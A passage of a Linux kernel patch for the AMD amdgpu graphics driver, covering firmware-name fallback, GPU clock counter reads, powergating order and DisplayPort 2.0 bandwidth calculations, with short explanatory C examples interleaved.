++		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes%s.bin",
++			 ucode_prefix,
++			 pipe == AMDGPU_MES_SCHED_PIPE ? "_2" : "1");
++		need_retry = true;
++	} else {
++		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes%s.bin",
++			 ucode_prefix,
++			 pipe == AMDGPU_MES_SCHED_PIPE ? "" : "1");
++	}
++
+ 	r = amdgpu_ucode_request(adev, &adev->mes.fw[pipe], fw_name);
++	if (r && need_retry && pipe == AMDGPU_MES_SCHED_PIPE) {
++		snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes.bin",
++			 ucode_prefix);
++		DRM_INFO("try to fall back to %s\n", fw_name);
++		r = amdgpu_ucode_request(adev, &adev->mes.fw[pipe],
++					 fw_name);
++	}
++
+ 	if (r)
+ 		goto out;
+ 
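
amdgpu_mes_init_microcode() now tries the new *_mes_2.bin name first and falls back to the legacy *_mes.bin when that request fails, so one driver binary works against both firmware sets. A toy userspace version of the request-then-fall-back flow; request_fw() fakes the firmware loader and the file names are only examples.

#include <stdio.h>
#include <string.h>

/* Stand-in for amdgpu_ucode_request(): "loads" a firmware file, and
 * fails unless the name matches what this fake filesystem contains. */
static int request_fw(const char *name)
{
        return strcmp(name, "gc_11_0_0_mes.bin") ? -2 /* -ENOENT */ : 0;
}

int main(void)
{
        char fw_name[40];
        int r;

        /* Prefer the new naming scheme, fall back to the legacy name. */
        snprintf(fw_name, sizeof(fw_name), "gc_11_0_0_mes_2.bin");
        r = request_fw(fw_name);
        if (r) {
                snprintf(fw_name, sizeof(fw_name), "gc_11_0_0_mes.bin");
                printf("falling back to %s\n", fw_name);
                r = request_fw(fw_name);
        }

        printf("load %s: %d\n", fw_name, r);
        return 0;
}
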
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
+index af94ac580d3e1..2127aab74a68f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
+@@ -8236,8 +8236,14 @@ static int gfx_v10_0_set_powergating_state(void *handle,
+ 	case IP_VERSION(10, 3, 3):
+ 	case IP_VERSION(10, 3, 6):
+ 	case IP_VERSION(10, 3, 7):
++		if (!enable)
++			amdgpu_gfx_off_ctrl(adev, false);
++
+ 		gfx_v10_cntl_pg(adev, enable);
+-		amdgpu_gfx_off_ctrl(adev, enable);
++
++		if (enable)
++			amdgpu_gfx_off_ctrl(adev, true);
++
+ 		break;
+ 	default:
+ 		break;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 0dd2fe4f071e8..bc65fc1350f9a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -4641,13 +4641,29 @@ static int gfx_v11_0_post_soft_reset(void *handle)
+ static uint64_t gfx_v11_0_get_gpu_clock_counter(struct amdgpu_device *adev)
+ {
+ 	uint64_t clock;
++	uint64_t clock_counter_lo, clock_counter_hi_pre, clock_counter_hi_after;
++
++	if (amdgpu_sriov_vf(adev)) {
++		amdgpu_gfx_off_ctrl(adev, false);
++		mutex_lock(&adev->gfx.gpu_clock_mutex);
++		clock_counter_hi_pre = (uint64_t)RREG32_SOC15(GC, 0, regCP_MES_MTIME_HI);
++		clock_counter_lo = (uint64_t)RREG32_SOC15(GC, 0, regCP_MES_MTIME_LO);
++		clock_counter_hi_after = (uint64_t)RREG32_SOC15(GC, 0, regCP_MES_MTIME_HI);
++		if (clock_counter_hi_pre != clock_counter_hi_after)
++			clock_counter_lo = (uint64_t)RREG32_SOC15(GC, 0, regCP_MES_MTIME_LO);
++		mutex_unlock(&adev->gfx.gpu_clock_mutex);
++		amdgpu_gfx_off_ctrl(adev, true);
++	} else {
++		preempt_disable();
++		clock_counter_hi_pre = (uint64_t)RREG32_SOC15(SMUIO, 0, regGOLDEN_TSC_COUNT_UPPER);
++		clock_counter_lo = (uint64_t)RREG32_SOC15(SMUIO, 0, regGOLDEN_TSC_COUNT_LOWER);
++		clock_counter_hi_after = (uint64_t)RREG32_SOC15(SMUIO, 0, regGOLDEN_TSC_COUNT_UPPER);
++		if (clock_counter_hi_pre != clock_counter_hi_after)
++			clock_counter_lo = (uint64_t)RREG32_SOC15(SMUIO, 0, regGOLDEN_TSC_COUNT_LOWER);
++		preempt_enable();
++	}
++	clock = clock_counter_lo | (clock_counter_hi_after << 32ULL);
+ 
+-	amdgpu_gfx_off_ctrl(adev, false);
+-	mutex_lock(&adev->gfx.gpu_clock_mutex);
+-	clock = (uint64_t)RREG32_SOC15(SMUIO, 0, regGOLDEN_TSC_COUNT_LOWER) |
+-		((uint64_t)RREG32_SOC15(SMUIO, 0, regGOLDEN_TSC_COUNT_UPPER) << 32ULL);
+-	mutex_unlock(&adev->gfx.gpu_clock_mutex);
+-	amdgpu_gfx_off_ctrl(adev, true);
+ 	return clock;
+ }
+ 
+@@ -5085,8 +5101,14 @@ static int gfx_v11_0_set_powergating_state(void *handle,
+ 		break;
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 4):
++		if (!enable)
++			amdgpu_gfx_off_ctrl(adev, false);
++
+ 		gfx_v11_cntl_pg(adev, enable);
+-		amdgpu_gfx_off_ctrl(adev, enable);
++
++		if (enable)
++			amdgpu_gfx_off_ctrl(adev, true);
++
+ 		break;
+ 	default:
+ 		break;
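
The reworked gfx_v11_0_get_gpu_clock_counter() samples hi, then lo, then hi again, and re-reads lo if the high word changed in between — the standard way to get a consistent 64-bit value from a free-running counter exposed as two 32-bit registers. A self-contained sketch of the technique; the register accessors are simulated, not real MMIO.

#include <stdint.h>
#include <stdio.h>

/* Simulated 64-bit hardware counter exposed as two 32-bit registers;
 * it starts one tick before a carry into the high word. */
static uint64_t hw_counter = 0xffffffff;

static uint32_t read_lo(void) { return (uint32_t)hw_counter++; }
static uint32_t read_hi(void) { return (uint32_t)(hw_counter >> 32); }

/* hi/lo/hi sampling: if the high word changed while the low word was
 * read, a carry happened in between, so re-read the low word to pair
 * it with the new high word. */
static uint64_t read_counter64(void)
{
        uint32_t hi_pre, lo, hi_post;

        hi_pre = read_hi();
        lo = read_lo();
        hi_post = read_hi();
        if (hi_pre != hi_post)
                lo = read_lo();

        return ((uint64_t)hi_post << 32) | lo;
}

int main(void)
{
        /* Prints 0x0000000100000000: the rollover was caught. */
        printf("counter = 0x%016llx\n",
               (unsigned long long)read_counter64());
        return 0;
}
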
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+index 2d11e8e7e1235..7124347d2b6c4 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+@@ -31,6 +31,8 @@
+ #include "umc_v8_10.h"
+ #include "athub/athub_3_0_0_sh_mask.h"
+ #include "athub/athub_3_0_0_offset.h"
++#include "dcn/dcn_3_2_0_offset.h"
++#include "dcn/dcn_3_2_0_sh_mask.h"
+ #include "oss/osssys_6_0_0_offset.h"
+ #include "ivsrcid/vmc/irqsrcs_vmc_1_0.h"
+ #include "navi10_enum.h"
+@@ -523,7 +525,24 @@ static void gmc_v11_0_get_vm_pte(struct amdgpu_device *adev,
+ 
+ static unsigned gmc_v11_0_get_vbios_fb_size(struct amdgpu_device *adev)
+ {
+-	return 0;
++	u32 d1vga_control = RREG32_SOC15(DCE, 0, regD1VGA_CONTROL);
++	unsigned size;
++
++	if (REG_GET_FIELD(d1vga_control, D1VGA_CONTROL, D1VGA_MODE_ENABLE)) {
++		size = AMDGPU_VBIOS_VGA_ALLOCATION;
++	} else {
++		u32 viewport;
++		u32 pitch;
++
++		viewport = RREG32_SOC15(DCE, 0, regHUBP0_DCSURF_PRI_VIEWPORT_DIMENSION);
++		pitch = RREG32_SOC15(DCE, 0, regHUBPREQ0_DCSURF_SURFACE_PITCH);
++		size = (REG_GET_FIELD(viewport,
++					HUBP0_DCSURF_PRI_VIEWPORT_DIMENSION, PRI_VIEWPORT_HEIGHT) *
++				REG_GET_FIELD(pitch, HUBPREQ0_DCSURF_SURFACE_PITCH, PITCH) *
++				4);
++	}
++
++	return size;
+ }
+ 
+ static const struct amdgpu_gmc_funcs gmc_v11_0_gmc_funcs = {
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index e3168149ca8f6..08766b6784361 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -33,13 +33,20 @@
+ #include "mes_v11_api_def.h"
+ 
+ MODULE_FIRMWARE("amdgpu/gc_11_0_0_mes.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_0_mes_2.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_0_mes1.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_1_mes.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_1_mes_2.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_1_mes1.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_2_mes.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_2_mes_2.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_2_mes1.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_3_mes.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_3_mes_2.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_3_mes1.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_mes.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_mes_2.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_mes1.bin");
+ 
+ static int mes_v11_0_hw_fini(void *handle);
+ static int mes_v11_0_kiq_hw_init(struct amdgpu_device *adev);
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+index 77d5a6f304094..5b251d0094678 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+@@ -1908,7 +1908,7 @@ static int sdma_v4_0_sw_fini(void *handle)
+ 			amdgpu_ring_fini(&adev->sdma.instance[i].page);
+ 	}
+ 
+-	if (adev->ip_versions[SDMA0_HWIP][0] == IP_VERSION(4, 2, 0) ||
++	if (adev->ip_versions[SDMA0_HWIP][0] == IP_VERSION(4, 2, 2) ||
+             adev->ip_versions[SDMA0_HWIP][0] == IP_VERSION(4, 4, 0))
+ 		amdgpu_sdma_destroy_inst_ctx(adev, true);
+ 	else
+diff --git a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+index 074e70a5c458e..e507d2e1410b7 100644
+--- a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
++++ b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+@@ -516,11 +516,8 @@ static enum bp_result get_gpio_i2c_info(
+ 	info->i2c_slave_address = record->i2c_slave_addr;
+ 
+ 	/* TODO: check how to get register offset for en, Y, etc. */
+-	info->gpio_info.clk_a_register_index =
+-			le16_to_cpu(
+-			header->gpio_pin[table_index].data_a_reg_index);
+-	info->gpio_info.clk_a_shift =
+-			header->gpio_pin[table_index].gpio_bitshift;
++	info->gpio_info.clk_a_register_index = le16_to_cpu(pin->data_a_reg_index);
++	info->gpio_info.clk_a_shift = pin->gpio_bitshift;
+ 
+ 	return BP_RESULT_OK;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c b/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c
+index 0541e87e4f389..a461e9463534b 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c
++++ b/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c
+@@ -764,7 +764,8 @@ void dc_dmub_setup_subvp_dmub_command(struct dc *dc,
+ 					!pipe->top_pipe && !pipe->prev_odm_pipe &&
+ 					pipe->stream->mall_stream_config.type == SUBVP_MAIN) {
+ 				populate_subvp_cmd_pipe_info(dc, context, &cmd, pipe, cmd_pipe_index++);
+-			} else if (pipe->plane_state && pipe->stream->mall_stream_config.type == SUBVP_NONE) {
++			} else if (pipe->plane_state && pipe->stream->mall_stream_config.type == SUBVP_NONE &&
++				    !pipe->top_pipe && !pipe->prev_odm_pipe) {
+ 				// Don't need to check for ActiveDRAMClockChangeMargin < 0, not valid in cases where
+ 				// we run through DML without calculating "natural" P-state support
+ 				populate_subvp_cmd_vblank_pipe_info(dc, context, &cmd, pipe, cmd_pipe_index++);
+diff --git a/drivers/gpu/drm/amd/display/dc/dce/dce_transform.c b/drivers/gpu/drm/amd/display/dc/dce/dce_transform.c
+index d9fd4ec60588f..670d5ab9d9984 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce/dce_transform.c
++++ b/drivers/gpu/drm/amd/display/dc/dce/dce_transform.c
+@@ -1009,7 +1009,7 @@ static void dce_transform_set_pixel_storage_depth(
+ 		color_depth = COLOR_DEPTH_101010;
+ 		pixel_depth = 0;
+ 		expan_mode  = 1;
+-		BREAK_TO_DEBUGGER();
++		DC_LOG_DC("The pixel depth %d is not valid; using COLOR_DEPTH_101010 instead.", depth);
+ 		break;
+ 	}
+ 
+@@ -1023,8 +1023,7 @@ static void dce_transform_set_pixel_storage_depth(
+ 	if (!(xfm_dce->lb_pixel_depth_supported & depth)) {
+ 		/*we should use unsupported capabilities
+ 		 *  unless it is required by w/a*/
+-		DC_LOG_WARNING("%s: Capability not supported",
+-			__func__);
++		DC_LOG_DC("%s: Capability not supported", __func__);
+ 	}
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+index c20e9f76f0213..a1b312483d7f1 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+@@ -629,7 +629,8 @@ void dcn30_init_hw(struct dc *dc)
+ 	if (dc->clk_mgr->funcs->notify_wm_ranges)
+ 		dc->clk_mgr->funcs->notify_wm_ranges(dc->clk_mgr);
+ 
+-	if (dc->clk_mgr->funcs->set_hard_max_memclk)
++	// if softmax is enabled then hardmax will be set by a different call
++	if (dc->clk_mgr->funcs->set_hard_max_memclk && !dc->clk_mgr->dc_mode_softmax_enabled)
+ 		dc->clk_mgr->funcs->set_hard_max_memclk(dc->clk_mgr);
+ 
+ 	if (dc->res_pool->hubbub->funcs->force_pstate_change_control)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hwseq.c
+index bdf101547484a..d4ee533deff32 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hwseq.c
+@@ -284,7 +284,7 @@ void dcn31_init_hw(struct dc *dc)
+ 	if (dc->clk_mgr->funcs->notify_wm_ranges)
+ 		dc->clk_mgr->funcs->notify_wm_ranges(dc->clk_mgr);
+ 
+-	if (dc->clk_mgr->funcs->set_hard_max_memclk)
++	if (dc->clk_mgr->funcs->set_hard_max_memclk && !dc->clk_mgr->dc_mode_softmax_enabled)
+ 		dc->clk_mgr->funcs->set_hard_max_memclk(dc->clk_mgr);
+ 
+ 	if (dc->res_pool->hubbub->funcs->force_pstate_change_control)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index e9188bce62e0b..2f4afe40f3e68 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -970,7 +970,7 @@ void dcn32_init_hw(struct dc *dc)
+ 	if (dc->clk_mgr->funcs->notify_wm_ranges)
+ 		dc->clk_mgr->funcs->notify_wm_ranges(dc->clk_mgr);
+ 
+-	if (dc->clk_mgr->funcs->set_hard_max_memclk)
++	if (dc->clk_mgr->funcs->set_hard_max_memclk && !dc->clk_mgr->dc_mode_softmax_enabled)
+ 		dc->clk_mgr->funcs->set_hard_max_memclk(dc->clk_mgr);
+ 
+ 	if (dc->res_pool->hubbub->funcs->force_pstate_change_control)
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
+index 49da8119b28e9..861f32b3248e7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
+@@ -4866,7 +4866,7 @@ void dml30_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->DETBufferSizeCThisState[k],
+ 							&v->UrgentBurstFactorCursorPre[k],
+ 							&v->UrgentBurstFactorLumaPre[k],
+-							&v->UrgentBurstFactorChroma[k],
++							&v->UrgentBurstFactorChromaPre[k],
+ 							&v->NoUrgentLatencyHidingPre[k]);
+ 				}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
+index b612edb144172..cf8f3d690fa66 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
+@@ -4305,11 +4305,11 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->AudioSampleRate[k],
+ 							v->AudioSampleLayout[k],
+ 							v->ODMCombineEnablePerState[i][k]);
+-				} else if (v->Output[k] == dm_dp || v->Output[k] == dm_edp) {
++				} else if (v->Output[k] == dm_dp || v->Output[k] == dm_edp || v->Output[k] == dm_dp2p0) {
+ 					if (v->DSCEnable[k] == true) {
+ 						v->RequiresDSC[i][k] = true;
+ 						v->LinkDSCEnable = true;
+-						if (v->Output[k] == dm_dp) {
++						if (v->Output[k] == dm_dp || v->Output[k] == dm_dp2p0) {
+ 							v->RequiresFEC[i][k] = true;
+ 						} else {
+ 							v->RequiresFEC[i][k] = false;
+@@ -4317,107 +4317,201 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 					} else {
+ 						v->RequiresDSC[i][k] = false;
+ 						v->LinkDSCEnable = false;
+-						v->RequiresFEC[i][k] = false;
+-					}
+-
+-					v->Outbpp = BPP_INVALID;
+-					if (v->PHYCLKPerState[i] >= 270.0) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 2700,
+-								v->OutputLinkDPLanes[k],
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						// TODO: Need some other way to handle this nonsense
+-						// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR"
+-					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 540.0) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 5400,
+-								v->OutputLinkDPLanes[k],
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						// TODO: Need some other way to handle this nonsense
+-						// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR2"
+-					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 810.0) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 8100,
+-								v->OutputLinkDPLanes[k],
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						// TODO: Need some other way to handle this nonsense
+-						// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR3"
+-					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[i] >= 10000.0 / 18) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 10000,
+-								4,
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						//v->OutputTypeAndRatePerState[i][k] = v->Output[k] & "10x4";
++						if (v->Output[k] == dm_dp2p0) {
++							v->RequiresFEC[i][k] = true;
++						} else {
++							v->RequiresFEC[i][k] = false;
++						}
+ 					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[i] >= 12000.0 / 18) {
+-						v->Outbpp = TruncToValidBPP(
+-								12000,
+-								4,
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						//v->OutputTypeAndRatePerState[i][k] = v->Output[k] & "12x4";
++					if (v->Output[k] == dm_dp2p0) {
++						v->Outbpp = BPP_INVALID;
++						if ((v->OutputLinkDPRate[k] == dm_dp_rate_na || v->OutputLinkDPRate[k] == dm_dp_rate_uhbr10) &&
++							v->PHYCLKD18PerState[k] >= 10000.0 / 18.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 10000,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[k] < 13500.0 / 18.0 &&
++								v->DSCEnable[k] == true && v->ForcedOutputLinkBPP[k] == 0) {
++								v->RequiresDSC[i][k] = true;
++								v->LinkDSCEnable = true;
++								v->Outbpp = TruncToValidBPP(
++										(1.0 - v->Downspreading / 100.0) * 10000,
++										v->OutputLinkDPLanes[k],
++										v->HTotal[k],
++										v->HActive[k],
++										v->PixelClockBackEnd[k],
++										v->ForcedOutputLinkBPP[k],
++										v->LinkDSCEnable,
++										v->Output[k],
++										v->OutputFormat[k],
++										v->DSCInputBitPerComponent[k],
++										v->NumberOfDSCSlices[k],
++										v->AudioSampleRate[k],
++										v->AudioSampleLayout[k],
++										v->ODMCombineEnablePerState[i][k]);
++							}
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " UHBR10"
++						}
++						if (v->Outbpp == BPP_INVALID &&
++							(v->OutputLinkDPRate[k] == dm_dp_rate_na || v->OutputLinkDPRate[k] == dm_dp_rate_uhbr13p5) &&
++							v->PHYCLKD18PerState[k] >= 13500.0 / 18.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 13500,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[k] < 20000.0 / 18.0 &&
++								v->DSCEnable[k] == true && v->ForcedOutputLinkBPP[k] == 0) {
++								v->RequiresDSC[i][k] = true;
++								v->LinkDSCEnable = true;
++								v->Outbpp = TruncToValidBPP(
++										(1.0 - v->Downspreading / 100.0) * 13500,
++										v->OutputLinkDPLanes[k],
++										v->HTotal[k],
++										v->HActive[k],
++										v->PixelClockBackEnd[k],
++										v->ForcedOutputLinkBPP[k],
++										v->LinkDSCEnable,
++										v->Output[k],
++										v->OutputFormat[k],
++										v->DSCInputBitPerComponent[k],
++										v->NumberOfDSCSlices[k],
++										v->AudioSampleRate[k],
++										v->AudioSampleLayout[k],
++										v->ODMCombineEnablePerState[i][k]);
++							}
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " UHBR13p5"
++						}
++						if (v->Outbpp == BPP_INVALID &&
++							(v->OutputLinkDPRate[k] == dm_dp_rate_na || v->OutputLinkDPRate[k] == dm_dp_rate_uhbr20) &&
++							v->PHYCLKD18PerState[k] >= 20000.0 / 18.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 20000,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							if (v->Outbpp == BPP_INVALID && v->DSCEnable[k] == true &&
++								v->ForcedOutputLinkBPP[k] == 0) {
++								v->RequiresDSC[i][k] = true;
++								v->LinkDSCEnable = true;
++								v->Outbpp = TruncToValidBPP(
++										(1.0 - v->Downspreading / 100.0) * 20000,
++										v->OutputLinkDPLanes[k],
++										v->HTotal[k],
++										v->HActive[k],
++										v->PixelClockBackEnd[k],
++										v->ForcedOutputLinkBPP[k],
++										v->LinkDSCEnable,
++										v->Output[k],
++										v->OutputFormat[k],
++										v->DSCInputBitPerComponent[k],
++										v->NumberOfDSCSlices[k],
++										v->AudioSampleRate[k],
++										v->AudioSampleLayout[k],
++										v->ODMCombineEnablePerState[i][k]);
++							}
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " UHBR20"
++						}
++					} else {
++						v->Outbpp = BPP_INVALID;
++						if (v->PHYCLKPerState[i] >= 270.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 2700,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR"
++						}
++						if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 540.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 5400,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
